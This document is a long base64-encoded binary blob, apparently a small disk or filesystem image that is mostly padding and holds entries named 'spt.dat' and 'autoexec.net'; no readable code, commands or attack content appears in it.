"AQEAARlIZGJnYXJlYQAAAAAAAAAYAAAAAUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACcQADH/xib290AAAAAAAAAAAAAAAgAAwBSHNwdC5kYXQAAAAAAAAAGrAP6AFoYXV0b2V4ZWMubmV0AAAB9AFaHBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADO7dvbAAMACQAABmwIAADJZztbbbAADAAJAAAAxswhiLAhhNJyNhpOxlxTgf//E6GMADEbDDef/+OBwA7zyOB1MUIw6Bgf8tB//94E9vn/dAWS+MD/////+wBfsIj/+IY3/5P/r//xgf///////////////////////9A8iPyosmBhiORkLhoMxcMhoNBcMRxnfLA+QExfkAArjOC+I4oYjlDiOIuIA5jPDAw1zHYz4wP/////////////////60kkGAB4RmQFkCM7/////////////////3gACAAASIxX//////////////////////////////////////////////////////////////////////////////////////////+GAAgAALsAYH///////////////////kBxtgIAAMYUAKAjf/////////////////4gaMCASMVAAwRiv///9A/hAQBiZhQZGAnG8yGUY+/cq4H/jRf9STHA/QLAACyv1gf////YEgAC+vwGAAEABAONAeHoU37gf/////xEEIL/jQf84H///////////////////+mHHGpUqACkTsIP/A+eO+MD+7mwPpN4/88ds/OZb4gAQ5ZwlgbEeGB+5phNO8sACAAAdM/94H//1hmEIzywP//1Dk98gdD//6wP////////////7Yq/60X/mB/AVLUAjmPzA////+dkz8/P////ngf////////////////////////8TIACFZM2qSWTP/////xwP////////+Fkz////////////2wACAAATY8////6WTP///////////////////////////////////////+AVkz//////////////////////////////////////////////6wACAAAUwBgf////////////////////////AyAAhSJ4AgAB2TP/////////////////////////////////////////////////////////////////7wACAAAUb//////+FkzxAlkz///////////////////////////////////////////////////////////////////////0C2TP/////////////1wAAgAAHgAYH7f+Bcv6Y31wP//////////////+gHir/9aL/vA/gKAACCOY/MD////5gmcw4HhgABAAQDjAHh7Idgf////////////////////////////9TIACFKVpUoBrJn////////////////////////////////+2AAIAABarE//rZM////////////////////////////////////8QPZM//////////////////////////////+gRYVMGIjCgEIFh7/9cD///////////////////3gACAAAmo2///////////////////////////6CZL4AQMTMKYSwPjcVMD/zov+gH1zifQCwQEct9YH///8/YYH3h1EJLxGAAEAB0CDw9o/fA/////////////////////////////hkABClG0rIf4AKROxQ/8D5474wP7Lr8cD0w75wP147LeYFxnngf////////2HJ7xXnA///////6YAIAABohRf///////uCoWoBAAqMKAJQQvv///////3wP/////////////////////6A+PaAoFvDCh3MEfb/////////////////////9MD/////////lVqMD//+8T//////////////////cAAIAABLju///kdz/////////////////////////////////////////////fA///////////////////////////////////////////WACAAATZ4f///////////////////////YEkJf//3E////////////////////////////////////////////////////////////////88AACAAATq93//9gf////////////////////////////////////////////////////////////////9wJW////uJ///////////////////+GAAgAAEuP9/1Hc/////////////////////////////////////////////3wP///////////////////////////////////////////+YAIAABNnx//////////////////////yBI+X//9xP/////////////////////////////////////////////////////////////////1wAAIAABOsHf//2B////////////////////////////////////////////////////////////////UCVn///7if////////////////////5YACAAASY7n/////////////////////////////////////////////GB/////////////////////////////////////////////+wAIAABOoB////////////////////+4Ejpf//3E//////////////////////////////////////////////////////////////////88D94ACAAATMn/////////////////////////////////////////////////////////////////0BK4X//9xP//////////////////////TAAIAABLkff/SIP/////////////////////////////////////////+wP//////////////////////////////////////////////+OACAAATqEf//////////////////+oEjZf//3E//////////////////////////////////////////////////////////////////88D//uAAgAAEzZ////////////////////////////////////////////////////////////////wBK0X//9xP///////////////////////2wACAAAS5L2SIP/////////////////////////////////////////+wP////////////////////////////////////////////////ngAgAAE+iH/////////////////+YEjJf//3E//////////////////////////////////////////////////////////////////88D///+GAACAAAVOn///////////////////////////////8DJZIDACMMKA4gS0v///////////////////////////////sD///////////////////////////tgAgAAEiTN///////////////////////////////////////////////////////////////////////////////////////////hgAIAACuAGB////////////oHREgGAAYYUARAiN////////////1gf////////////+gFJFQMJJJ6TMXMBUAIAgABhgIRRf/////xAcIKf+B88gY3zxzgSFYmSFhmB8AG9EAAAC+piQAzq8AIGDIaDGcDgY83GTQeGB//UBxBjA/B9yLy0AgQAxM2EZaH4hQfGB+NB/zgf//////////////////////////////////9sAACAAAdJjX///////////////////////5WJP/MD////+2JPL8///7gkVgkVAbof/+JBNJyNhpOxl3v//jgf/////////////////////////////////8f+B85h3/////////////ICAQABABBkTQBBkAFQv//+wACAAATovn////////4CYZP////////5gf//6IZ//////////////////////////////////////////////////////////////////////mAAgAAJyzf/rZIgECgAAQAINMiTEOB/6C2iACCNM4RAWCACKH/jnfmB/////7/yMAE/8IABQQkTAxTKpBhH/7AXPAQhiukhxhYoYUhowBLWYzA6/8CmTIeeBtxvkzceYBAm49MDbj4wP/////////////////////////////////////////////////////////////////////////7YAIAAC4tAf///qGLotc6sJYHA9koCYtwkAEzdArtXhgf//////////9U7D+AVEmwoRB////E9Fy9U/jgQRfMQHo///8wP/9KHYgEARIwoCRAQTScjYaTsZeD/mBoYcADICRWCRVpf88D//////////8AGHl/////+IBK5jhCf/////kATJCE8CkVBkNRsMS+Msh4YH5kkf///////////////////////vgfOSRwzyfngfaSR/////////tgAgAAH+G/7YH//ypIf///////////YHzkkcNMn54H2kkf///////////////////////+aikbABBAIwphEAoARzaPGbh4Yj//////////gfM99sD////5gOK8GQymYwnU2HT3/5v8Awmv////88D//////////////////////////eACAAAZZJv/////////////////////////////////916AHnY2GE3DEazCv9a9H/////9KOFOAEChTCmEQCQxDC0/1wP//////////////////////////////////////////////+mACAAAiKE3////////+akqPIAFENRwlgZmBJTjEwIFDrlfp9DoHICCUC4QaGh5eym2SAX5hXCABCZXzntgf/////////////////////yU8gFAYkwphLA////////////////////////////////////KiZchomYUwlgf///////////////////1wAAIAABIjgf//////////////////////////////////////////////////////////////////////////////////////////4YACAAAUwBgf/////////////////////////////////////////////////////////////////////////////////////////4AN+v1KAvOhyGA2HOACAAAi8p64H///////8IX4ZTcZDGaDScIW3//kVCGMxiNhlvf//LApEKZMFpHMJ0Mp3MJ54v//gVIYHgICgcjeZDqYzpxv//DA////////6IIXf//4MBgMRuQRrx+AWI7A///////////////////////////////////////////////////////////2AAA3gAbqX//////wGxorYRYAQAQISDhLA///D/33jgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA